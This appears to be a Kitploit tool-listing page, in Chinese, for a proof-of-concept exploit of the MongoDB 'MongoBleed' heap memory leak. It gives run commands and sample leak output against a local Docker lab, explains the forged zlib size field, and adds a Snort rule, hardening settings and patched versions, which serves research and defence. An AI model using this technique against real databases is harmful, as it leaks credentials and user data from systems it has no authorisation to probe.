Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-14857-MongoBleed — 针对 CVE-2025-14847 (MongoBleed) 的功能性概念验证利用工具,这是一个 MongoDB 中预认证堆内存泄露漏洞。包含自动内存泄露检测、模式分析以及基于 Docker 的实验室环境,用于授权的安全测试和研究。 | Kitploit
工具/GitHubGitHub/ermensonx/cve-2025-14857-mongobleed
内存取证漏洞分析漏洞利用渗透测试学习与教育数据库安全
GitHubermensonx/cve-2025-14857-mongobleed

CVE-2025-14857-MongoBleed

针对 CVE-2025-14847 (MongoBleed) 的功能性概念验证利用工具,这是一个 MongoDB 中预认证堆内存泄露漏洞。包含自动内存泄露检测、模式分析以及基于 Docker 的实验室环境,用于授权的安全测试和研究。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
7个月前尚未审核

CVE-2025-14847 (MongoBleed) - 功能型 PoC

MongoDB 内存泄露利用 - 模拟 R6 攻击

CVE MongoDB Status Taxa

CVE-2025-14847 (MongoBleed) 的完整概念验证
已测试:✅ MongoDB 7.0.5 | 14.300+ 次成功利用 | 4 个 UUID 泄露


🎯 关于本项目

本仓库包含一个功能完整的概念验证(PoC),针对漏洞 CVE-2025-14847,也称为 MongoBleed——MongoDB 中一个严重的预认证堆内存泄露缺陷。

背景:彩虹六号:围攻 事件

在 2025 年 12 月,游戏《彩虹六号:围攻》遭受了一次大规模攻击,约 50,000 个玩家账户被入侵。怀疑攻击者利用后端 MongoDB 的这个漏洞泄露了以下内容:

  • 🔑 服务器身份验证令牌(R6S_SERVER_AUTH_*)
  • 👤 玩家 UUID 和会话 ID
  • 🛡️ 管理权限标志(TOURNAMENT_ADMIN,DEV_BUILD_WHITELIST)

本 PoC 使用真实的 R6 数据模拟该攻击。


🔥 功能特性

  • ✅ 100% 功能性的漏洞利用,针对 MongoDB 7.0.5
  • ✅ 3 种利用工具:
    • poc.py - 主漏洞利用,含模式分析
    • live_leaker.py - 高级增量扫描
    • popular_heap.py - 用于使用目标数据填充堆的脚本
  • ✅ 完整的 Docker 环境,包含有漏洞的 MongoDB
  • ✅ 1500+ 个模拟的 R6 后端文档
  • ✅ 自动检测 10 种敏感模式(JWT、令牌、UUID、IP)
  • ✅ 结构化的 JSON 报告
  • ✅ 完整的技术文档(200+ 页)

📊 已验证结果

提取的 UUID(实际证明)

root@kitploit:~
246434ed-759b-4ce9-bb9c-2f520a9919b8
980ab3a7-0230-4718-aa2d-fb28feafd7f5
1052a310-4cdc-492f-9890-465d76baba9b
f20debfa-298d-48e3-b3b9-9a0e037c0fbd

🚀 快速开始

先决条件

  • Docker 与 Docker Compose
  • Python 3.8+

安装

root@kitploit:~
# 克隆仓库
git clone CVE-2025-14857-MongoBleed.git
cd MongoDBPoc

# 启动有漏洞的环境
docker-compose up -d

# 等待初始化(15-20 秒)
docker logs cve-2025-14847-lab | grep "R6 MASSIVE"

基本使用

root@kitploit:~
# 1. 用 R6 数据填充堆
python3 popular_heap.py 50

# 2. 检查漏洞
python3 poc.py --target 127.0.0.1 --check

# 3. 使用实时泄露器进行利用(推荐)
timeout 30 python3 live_leaker.py --host 127.0.0.1 --min 200 --max 3000 --save results.json

预期输出

root@kitploit:~
[!] MongoBleed Live Leaker 高级版
[!] 目标:127.0.0.1:27017
[!] 范围:doc_len 200 → 3000 (offset=500)

[*] 进度:doc_len=245/3000 | 尝试次数=100 | 成功率=100.0%

[!] 检测到 R6 模式 (doc_len=245):
    [UUID] 1 个新:
      └─ 246434ed-759b-4ce9-bb9c-2f520a9919b8

🔬 工作原理

漏洞机制

MongoDB 允许通过 zlib 进行消息压缩。漏洞在于声明大小与实际大小之间的验证不当:

root@kitploit:~
攻击者 → {compress: "zlib", uncompressedSize: 1MB, payload: <50 bytes>}
          ↓
服务器分配 1MB 堆空间  ← 漏洞
          ↓
服务器仅解压 50 字节
          ↓
服务器返回整个 1MB!
          └─ 50 字节 = 真实数据
          └─ ~1MB - 50 = 内存泄露

有漏洞的代码(简化版)

root@kitploit:~
// 补丁前
size_t uncompressedSize = header.uncompressedSize;  // ← 由攻击者控制
buffer = malloc(uncompressedSize);                  // ← 分配恶意大小
zlib_decompress(compressed, buffer);
send(buffer, uncompressedSize);                     // ← 泄露整个缓冲区

📂 项目结构

root@kitploit:~
MongoDBPoc/
├── poc.py                          # 主漏洞利用
├── live_leaker.py                  # 增量扫描(✨ 推荐)
├── popular_heap.py                 # 数据加载脚本
├── docker-compose.yml              # 有漏洞的 MongoDB 7.0.5
├── init-db.js                      # 1000 名玩家 + 500 个 R6 会话
├── GUIA_TECNICO_COMPLETO.md       # 详细文档(200+ 页)
├── README.MD                       # 英文文档
└── Portugues/                      # 翻译版本
    ├── poc_PT.py
    ├── README_PT.md
    └── GUIA_RAPIDO.md

🛡️ 受影响版本


🛡️ 检测与防御

Snort 签名

root@kitploit:~
alert tcp any any -> any 27017 (
    msg:"CVE-2025-14847 MongoBleed 攻击尝试";
    content:"|d4 07 00 00|";
    byte_test:4,>,1000000,4,little;
    sid:2025001;
)

安全配置 (mongod.conf)

root@kitploit:~
net:
  bindIp: 127.0.0.1              # 绝不要设为 0.0.0.0!
  compression:
    compressors: []              # 禁用 zlib

security:
  authorization: enabled

缓解优先级

  1. 🔴 严重:升级到修复版本
  2. 🟠 高:禁用 zlib 压缩
  3. 🟠 高:网络分段(防火墙)
  4. 🟡 中:启用身份验证

📚 文档

  • GUIA_TECNICO_COMPLETO.md - 完整技术分析(200+ 页)

    • R6 事件背景
    • 漏洞机制
    • 有漏洞代码与修复代码对比
    • 逐步执行
    • 结果与统计
    • IDS 签名与加固
  • README.MD - 主文档(英文)

  • Portugues/ - 翻译版本


⚠️ 法律声明

root@kitploit:~
此工具仅供授权测试和教育使用。

未经授权使用是违法的,可能导致:
- 刑事起诉(在巴西依据第 12.737/2012 号法律)
- 高额罚款
- 监禁

在测试前务必获得书面许可。

允许的使用

  • ✅ 获得书面授权的渗透测试
  • ✅ 在隔离环境中的学术研究
  • ✅ 供应商补丁验证
  • ✅ 安全团队培训

禁止的使用

  • ❌ 未经许可扫描或攻击系统
  • ❌ 访问生产数据库
  • ❌ 出售或武器化此代码

🙏 致谢

作者:Ermenson Jr
许可证:MIT(教育用途)
日期:2026 年 1 月

参考文献

  • MongoDB 安全公告
  • CVE-2025-14847 NVD
  • Akamai SIRT: MongoBleed 分析
  • Aikido Security

📧 联系方式

如有技术问题或安全研究合作意向:

  • GitHub Issues:使用本仓库的 Issues 标签页
  • 学术邮箱:参见 GitHub 个人资料

🌟 如果此项目对您有帮助

  • ⭐ 给本仓库加星
  • 🔄 分享给安全社区
  • 📝 在您的研究中引用
  • 🐛 通过 Issues 报告错误或改进建议

为负责任的攻击性安全研究而开发。
与育碧、MongoDB Inc. 或《彩虹六号:围攻》无关。

🔒 请负责任地使用。安全属于每个人。 🔒

下载工具
指标结果
已测试的 MongoDB7.0.5(有漏洞)
成功率100%(14,300/14,300 次请求)
泄露的 UUID4 个唯一
总泄露量33 个不同字符串
最大单次泄露176 字节/请求
检测到的模式网络日志、UUID、系统路径
MongoDB 系列有漏洞的版本修复版本
8.2.x8.2.0 – 8.2.28.2.3
8.0.x8.0.0 – 8.0.168.0.17
7.0.x7.0.0 – 7.0.277.0.28
6.0.x6.0.0 – 6.0.266.0.27
5.0.x5.0.0 – 5.0.315.0.32
4.4.x4.4.0 – 4.4.294.4.30
≤ 4.2全部无补丁(生命周期结束)